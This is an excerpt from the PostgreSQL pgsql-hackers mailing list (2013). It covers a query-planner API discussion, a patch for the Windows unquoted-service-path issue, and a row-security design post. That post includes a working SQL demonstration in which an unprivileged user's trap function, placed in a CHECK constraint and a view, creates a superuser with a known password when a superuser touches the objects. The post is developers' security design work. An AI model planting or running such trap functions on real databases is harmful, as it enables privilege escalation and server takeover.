addRangeTableEntryForRelation calls in view.c.  There may once have been
code that called plain addRangeTableEntry that way, or maybe not, but
I'm inclined to think we ought to keep the API contracts similar for
all those functions.

However, that logic doesn't immediately say whether it's better to
make these functions safe against null pstate arguments, or to insist
the callers conjure up a pstate.  After a quick look at the number
of pstate uses that have evolved in the addRangeTableEntryForFoo
functions, I'm inclined to think the latter might be the safer
course of action.  It's not that hard to make a dummy pstate,
and we could delete the logic for null pstate argument in multiple
places.  And not worry about whether the need to defend against
null pstate will propagate into called functions.

In any case, the issue looks bigger than just addRangeTableEntry
itself.  Do you want to write up a patch?

regards, tom lane


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


Re: [HACKERS] PostgreSQL Service on Windows does not start. ~ is not a valid Win32 application

2013-11-10 Thread Naoya Anzai
Hi Amit,

 I have uploaded your patch for next commit fest, hope you can support
 it if there is any feedback for your patch by reviewer/committer.
Thanks! Okay, I will support you.

Best Regards,
Naoya

 Hi Naoya,
 
 On Thu, Oct 31, 2013 at 5:42 PM, Robert Haas robertmh...@gmail.com wrote:
  On Thu, Oct 31, 2013 at 1:44 AM, Asif Naeem anaeem...@gmail.com wrote:
  On Thu, Oct 31, 2013 at 10:17 AM, Amit Kapila amit.kapil...@gmail.com
  wrote:
 
  On Tue, Oct 29, 2013 at 12:46 PM, Naoya Anzai
  anzai-na...@mxu.nes.nec.co.jp wrote:
   Hi Sandeep
  
   I think, you should change the subject line  to Unquoted service path
   containing space is vulnerable and can be exploited on Windows to get 
   the
   attention..  :)
   Thank you for advice!
   I'll try to post to pgsql-bugs again.
 
  I could also reproduce this issue. The situation is very rare such
  that an exe with name same as first part of directory should exist
  in installation path.
 
 
  If one of the committers who is knowledgeable about Windows has time
  to apply this *before* the next CommitFest, that's obviously great.
  But the purpose of adding a link to the next CommitFest is to provide
  a backstop, so that we're not relying solely on someone to notice this
  email thread and pick it up, but instead have the patch as part of a
  list of patches needing review.
 
 I have uploaded your patch for next commit fest, hope you can support
 it if there is any feedback for your patch by reviewer/committer.
 
 With Regards,
 Amit Kapila.
 EnterpriseDB: http://www.enterprisedb.com
 
 
 -- 
 Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
 To make changes to your subscription:
 http://www.postgresql.org/mailpref/pgsql-hackers
 

Regards,

Naoya

---
Naoya Anzai
Engineering Department
NEC Soft, Ltd.
E-Mail: anzai-na...@mxu.nes.nec.co.jp
---




-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers


[HACKERS] Exempting superuser from row-security isn't enough. Run predicates as DEFINER?

2013-11-10 Thread Craig Ringer
Hi all

I'm thinking about a possible solution for one of the row-security
issues - the ability of a malicious user to write a row-security policy
containing a malicious predicate function, then trick another user into
ttSELECT/tting from the table and running the function.

What about running the row-security predicate subquery as the predicate
definer - the user who SET the predicate - or the owner of the object
the predicate applies to? How expensive are security context and user id
changes - and is it even practical to do this within the context of a
security barrier subquery?

Oracle and Teradata get around this by making the assignment of row
security constraints a highly privileged operation - table owners can't
set their own. That's the other option IMO.

We already have this as a known issue with ttVIEW/tts,
ttCHECK/tt constraints, etc, as shown below - so I'm tempted to
hand-wave around it as a separate issue, and just say that you shouldn't
access objects created by untrusted users.

The problem is that CHECK constraints, VIEW access, etc doesn't affect
pg_dump, it won't run view predicates or check constraint code. By
contrast, pg_dump *does* read tables, so it needs to be exempted from
row-security predicates defined by untrusted users. An exemption option
is needed for performance anyway.

Protecting pg_dump and the superuser alone aren't good enough, though.
SuperSecretUser shouldn't have to fear SELECTing from a view written by
user NewThisWeek.

On a side note, pg_restore and psql running dump scripts *do* affect
restores, which is kind of nasty.

Here's a demo showing how to create a new superuser with a known
password as a regular unprivileged user if you can trick the superuser
into looking at one of your objects:


CREATE USER user1;

SET SESSION AUTHORIZATION user1;

CREATE OR REPLACE FUNCTION haha() RETURNS boolean AS $$
BEGIN
RAISE NOTICE 'haha running as: %',current_user;
CREATE USER haha PASSWORD 'haha' SUPERUSER;
RETURN true;
END;
$$ LANGUAGE plpgsql;

CREATE TABLE check_exploit ( a integer check (haha()) );

CREATE VIEW view_exploit AS SELECT * FROM check_exploit WHERE haha();

GRANT ALL ON check_exploit TO postgres;
GRANT ALL ON view_exploit TO postgres;

-- later, superuser comes along and looks at the table/view:
SET SESSION AUTHORIZATION postgres;


regress=# select * from view_exploit;
NOTICE:  haha running as: postgres
 a
---
 1
(1 row)

regress=# \du haha
   List of roles
 Role name | Attributes | Member of
---++---
 haha  | Superuser  | {}

regress=# DROP USER haha;



or for an admin reason adds/ modifies a row in the table:

regress=# INSERT INTO check_exploit VALUES (100);
NOTICE:  haha running as: postgres
INSERT 0 1


This even works with SECURITY BARRIER views, since they do nothing to
control the user ID the view predicate runs as.

If the superuser dumps this database then restores the schema and data
as two separate passes, haha will run via the check constraint in that
case too. Ouch.


So, we've got a few options:

* Run the RS constraint subqueries as DEFINER or table owner (if
possible and performant)

* Restrict the ability to set RS predicates to superuser by default, and
create a right to allow it to be delegated.

* Call it a separate problem and deal with it later, since similar
issues already apply to VIEW, CHECK, etc. Document that running pg_dump
as a user without RS exemption rights can run untrusted code written by
other users.

-- 
 Craig Ringer   http://www.2ndQuadrant.com/
 PostgreSQL Development, 24x7 Support, Training  Services


-- 
Sent via pgsql-hackers mailing list (pgsql-hackers@postgresql.org)
To make changes to your subscription:
http://www.postgresql.org/mailpref/pgsql-hackers